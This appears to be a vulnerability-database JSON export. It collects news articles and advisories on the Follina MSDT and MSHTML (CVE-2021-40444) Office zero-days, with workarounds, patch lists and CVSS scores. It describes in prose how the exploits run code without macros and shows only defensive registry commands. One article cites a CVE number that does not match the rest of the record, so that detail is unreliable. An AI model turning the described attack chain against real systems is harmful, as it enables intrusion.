It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who [tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend, noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c**Command Prompt as Administrator**\u201d; back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201d; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said.
However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. 
Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. 
He said the workaround is \u201cnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-16T18:44:44", "description": "In [September\u2019s Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability>) crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which \u2013 the Windows MSHTML zero-day \u2013 has been under active attack for nearly two weeks.\n\nOne other bug is listed as publicly known but isn\u2019t (yet) being exploited.
Immersive Labs\u2019 Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it\u2019s \u201cquite a light Patch Tuesday\u201d \u2013 at least on the surface, that is.\n\nThe flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.\n\nOf the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.\n\nOver the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) noted.\n\nSome observers pegged the top patching priority in this month\u2019s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft\u2019s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.\n\nDisclosed on Sept.
7, it\u2019s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.\n\n## Under Active Attack: CVE-2021-40444\n\nIt\u2019s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it\u2019s been nearly a week since attackers started to share blueprints on how to carry out an exploit.\n\nMicrosoft said last week that the flaw could let an attacker \u201ccraft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,\u201d after which \u201cthe attacker would then have to convince the user to open the malicious document.\u201d Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a [novel malware-obfuscation technique](<https://threatpost.com/microsoft-office-malware-protection-bypass/167652/>) to disable malicious macro warnings and deliver the ZLoader trojan.\n\nAn attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.\n\nSatnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.\n\n\u201cThere are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,\u201d Narang told Threatpost.\n\nLast Wednesday, Sept. 8, [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1435515875025633282>) \u2013 head of the security operations center for U.K. 
fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft \u2013 [noted](<https://twitter.com/GossiTheDog/status/1435562870331293706>) that the exploit had been in the wild for about a week or more.\n\nIt got worse: Last Thursday, Sept. 9, threat actors began [sharing exploit how-tos](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are \u201csimple to follow and [allow] anyone to create their own working version\u201d of the exploit, \u201cincluding a Python server to distribute the malicious documents and CAB files.\u201d\n\nIt took the publication all of 15 minutes to recreate the exploit.\n\nA week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had [urged mitigations](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.\n\nLast week, the company didn\u2019t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.\n\nMicrosoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.\n\nIn spite of there being no security updates available for the vulnerability at that time, Microsoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.\n\n## Mitigations That Don\u2019t Mitigate\n\nTracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended \u2013
mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.\n\nEmphasis on \u201ctry to:\u201d Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to [modify the exploit](<https://twitter.com/GossiTheDog/status/1435570418623070210>) so that it didn\u2019t use ActiveX, [effectively skirting Microsoft\u2019s mitigations](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/>).\n\nThe Zero Day Initiative [said that](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) for now, the most-effective defense is \u201cto apply the patch and avoid Office docs you aren\u2019t expecting to receive.\u201d\n\nBe sure to carefully review and install [all the needed patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for your setup: There\u2019s a long list of updates for specific platforms, and it\u2019s important not to slather on too thin a layer of protection.\n\nCredit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.\n\n## Baddest Bug Award\n\nThe award for baddest bug \u2013 or at least, the one with the highest severity rating, with a CVSS score of 9.8 \u2013 goes to [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>): a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.\n\n[OMI is an open-source project](<https://github.com/microsoft/omi>) to further the development of a production-quality implementation of the [DMTF CIM/WBEM](<https://www.dmtf.org/standards/cim>) standards.\n\n\u201cThis vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an 
affected system,\u201d the Zero Day Initiative explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.\n\n## Yet More PrintNightmare Patches\n\nMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671>) and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447>)), all rated important.\n\nThese are the three latest fixes in a steady [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler that followed the [disclosure of PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) in June. This probably won\u2019t be the last patch in that parade: Tenable\u2019s Narang told Threatpost that \u201cresearchers continue to discover ways to exploit Print Spooler\u201d and that the firm expects \u201ccontinued research in this area.\u201d\n\nOnly one \u2013 CVE-2021-38671 \u2013 of today\u2019s patch trio is rated as \u201cexploitation more likely.\u201d Regardless, organizations should prioritize patching these flaws as \u201cthey are extremely valuable to attackers in post-exploitation scenarios,\u201d Narang observed.\n\n## More \u2018Exploitation More Likely\u2019\n\nImmersive\u2019s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver ([CVE-2021-36955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955>), [CVE-2021-36963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963>), [CVE-2021-38633](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633>)) are also noteworthy, all of them
being listed as \u201cexploitation more likely.\u201d\n\n\u201cLocal priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,\u201d Breen said via email. \u201cThis allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.\u201d\n\nOne glaring example of that emerged in May, when hundreds of millions of [Dell users were found to be at risk](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.\n\nThe three exploits Microsoft patched on Tuesday aren\u2019t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.\n\nTwo other vulnerabilities \u2013 [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>), both Win32k escalation of privilege flaws \u2013 have also been listed as \u201cexploitation more likely\u201d and, together, cover the full range of supported Windows versions.\n\nBreen said that he\u2019s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They\u2019re not rated as high a severity risk as RCE bugs, but \u201cthese local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,\u201d he asserted. 
\u201cIf you can block them here you have the potential to significantly limit their damage.\u201d\n\n\u201cIf we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,\u201d Breen said.\n\n## Still, This RCE Is Pretty Important\n\nDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965>) \u2013 an important-rated Windows WLAN AutoConfig Service RCE vulnerability \u2013 given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.\n\nThe WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.\n\nThe patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.\n\nAs the Zero Day Initiative explained, that means an attacker could \u201ccompletely take over the target \u2013 provided they are on an adjacent network.\u201d That would come in quite handy in a [coffee-shop attack](<https://threatpost.com/microsoft-wi-fi-protection/145053/>), where multiple people use an unsecured Wi-Fi network.\n\nThis one \u201cis especially alarming,\u201d Kim said: Think [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) and PrintNightmare.\n\n\u201cAs recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds
and PrintNightmare attacks,\u201d he said in an email.\n\nKim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.\n\n\u201cIt specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker\u2019s end goal,\u201d he predicted. \u201cRemote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise\u2019s data.\u201d\n\nThe Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so \u201cdon\u2019t let the adjacent aspect of this bug diminish the severity,\u201d it said. \u201cDefinitely test and deploy this patch quickly.\u201d\n\n## And Don\u2019t Forget to Patch Chrome\n\nBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft\u2019s Chromium-based Edge.\n\nBrowsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.\n\n\u201cI cannot underestimate the importance of patching your browsers and keeping them up to date,\u201d he stressed. \u201cAfter all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you\u2019re thinking about your online banking or the data collected and stored by your organization\u2019s web apps, they could all be exposed by attacks that exploit the browser.\u201d", "cvss3": {}, "published": "2021-09-14T20:29:14", "type": "threatpost", "title": "Microsoft Patches Actively Exploited Windows Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-14T20:29:14", "id": "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "href": "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2022-01-19T17:41:35", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Products (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit.
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 
for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12278 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-18T00:00:00", "id": "KLA12278", "href": 
"https://threats.kaspersky.com/en/vulnerability/KLA12278/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T17:41:38", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems 
\nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12277 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-18T00:00:00", "id": "KLA12277", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12277/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. 
Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. 
\"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n",
